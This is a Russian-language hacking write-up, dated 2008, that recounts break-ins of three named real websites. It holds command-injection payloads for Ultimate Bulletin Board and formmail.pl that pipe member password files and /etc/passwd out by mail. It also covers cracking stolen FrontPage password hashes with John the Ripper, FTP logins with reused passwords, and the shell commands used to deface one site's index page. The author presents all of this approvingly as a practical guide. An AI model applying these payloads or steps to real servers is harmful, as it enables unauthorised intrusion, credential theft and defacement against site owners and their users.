Описания взломов серверов на конкретных примерах




www.kungfuklan.com
Все началось с того, что сидели мы в IRC - я, Ozzman и D@rk Sun. Время было позднее и я решил идти спать, но вдруг D@rk говорит, типа, гляньте сюда http://www.kungfuklan.com. Я решил посмотреть и попал на страницу какой-то то ли Корейской, то ли Китайской крэкерской группы. Ну так полазил, огляделся, зашел на форум, посмотрел релизы, в общем мне понравилось и дизайн классный :). Вдруг мне как 2-ое чуство говорит проверить папку CGI-BIN на доступность. Ну ввожу я http://www.kungfuklan.com/cgi-bin/, и что вы думаете ?:) Правильно! На этой папке был открыт доступ и можно посмотреть все скрипты :). Как раз за пару дней до этого на сайте группы DAMNED я прочитал о свеже найденной дырке в Ultimate Bulletin Board, данная доска и стояла у наших самураев :). Ozzman так же приметил это и не долго думая сохранил Sourse формы где был Replay и дописал в поле topic следующие:

topic='012345.ubb|mail ozzman@hacked.com


Но к сожалению пароли были в Shadow :(. Мы не стали огорчаться и поменяв строку на следующую:

topic='012345.ubb|cat Members/*|mail ozzman@hacked.com|'

получили пароли в открытом виде на всю доску! Но доски то мало :).

Начали исследовать дальше и сразу наткнулись на дирукторию _
private и файл .htpasswd . Если кто не знает - здесь обычно лежат хеши паролей FrontPage. Так же и в директории _private лежит файл services.pwd и тоже с паролями:). Поставив john'а перебирать пароли мы отправились дальше по директориям. Не найдя в общем-то ничего полезного пошли спать. После 3-х дней, D@rk наконец-то расшифровал пароли но они были от FrontPage :(, один из паролей был kickMe :), мы решили попробовать его по FTP и ура, ура, ура, пароль подошел и сервер в наших руках! Вот к чему приводит халатность… Админ (видать поленился придумать другой пароль для FTP, или забыть его побоялся :)). Просьба ко всем, если пароль еще не поменяли или не заделали дырку, не наносите никакого вреда данному серверу.

Вот так был взломан сайт клана Kungfu :). Спасибо группе DAMNED, за так сказать вовремя выложенную информацию.


www.w-three.net
В способе взлома этого сайта нет ничего нового и оригинального. Это скорее пример для ленивых администраторов и начинающих script kiddie, чем полезная информация для мало- мальски знающего хакера. В общем дырка заключалась в присутствии на сайте скрипта formmail.pl by Matt Wright версии 1.0 содержащего уязвимость позволяющую выполнять команды shell. Об этой уязвимости можно прочитать в cgi-bug на qwerty.nanko.ru, но я сам попробую описать принцип действия: для отправки почты скрипт использует следующую строку:

open (MAIL, "|$mailprog $FORM{'recipient'}")

где $FORM{'recipient'} поле recipient из вызывающего html и $mailprog='/bin/sendmail'. знак "|" означает выполнение команды shell. т.е. заменив на выполнится команду:

"/bin/sendmail; cat /etc/passwd | mail hacker@mail.com"

которая отправит файл с паролями на hacker@mail.com Вот в принципе и все что нужно знать для использования данной уязвимости. Теперь вернемся к взлому www.w-three.net. Мне повезло. Получив passwd я увидел там hash'ы паролей, а не "*" как при использовании shadow. Так как для данного сайта меня интересовал только deface и мне нужен был доступ для закачки файлов, то я выбрал всех пользователей у которых был доступ на ftp и скормил их john'у. Он сразу нашел пароль для пользователя gast - помогла буржуйская привычка ставить login=passwd. Во взломе помогло мне и то обстоятельство, что скрипт принадлежал и выполнялся с правами пользователя имеющего самый высокий доступ в системе(если не брать в расчет root'а). Я мог читать, изменять и создавать любые файлы которые принадлежали этому пользователю, а это были почти все файлы. Ну что ж, я имею все возможности для deface: доступ для закачки своего html и права на перезапись index.html лежащего на сайте. чем я и воспользовался:

mv
/usr/local/etc/httpd/htdocs/index.thml \ /usr/local/etc/httpd/htdocs/index1.html cp
/usr/local/etc/httpd/htdocs/gast/my.html /usr/local/etc/httpd/htdocs/index.html \

Вот так "плохие" пароли, не правильное распределение прав и не обновленные скрипты могут способствовать захвату сайта.


sinobord.hypermart.net
Всё началось с того, что Lynx рассказал(а) мне о commander.pl (даёт возможность исполнения команд как на shell кому интересно сходите и почитайте на www.hack-crack.com )и я стал искать сайты с этим скриптом и нашёл. Этим сайтом был sinoboard.hypermart.net (хост www.hypermart.net), как не странно там выводился листинг директорий. На некоторые каталоги стоял пароль (я бы сказал на все в которых могло быть что либо интересное).

Использование commander'a дало не много файл паролей, который лежал в /etc был, как я понял от www.hypermart.net, но там меня ждало разочарование все пароли в * хе-хе… (обидно понимаешь), а master.passwd не был доступен. Но я не стал разочаровываться и начал исследовать все каталоги, на которые был доступ без пароля. Много чего там было и чат, и доска объявлений, и всякая другая всячина.

Так- же там был и скрипт fileman.cgi по сути это файловый менеджер. На запуск этого скрипта пароль не стоял. Я стал смотреть содержимое каталогов через него, и какая же радость он не требовал пароля при открытии каталогов на которые стоял пароль. Пройдясь по каталогам ещё раз я нашёл то что мне было нужно, файлик service.pwd в _vti_pvt. Кстати этот менеджер давал возможность редактировать файлы так что я мог сразу записать новую запись в этот файл (наверное), но для начала я поставил файл на рассшифровку (там была всего одна учётная запись), и буквально через две минуты у меня на руках был пароль, он состоял из 4 цифр Для проверки зашёл по ftp всё работало.

 

 

Автор: Илюшко.А.В.                                                                                                                                2008 г.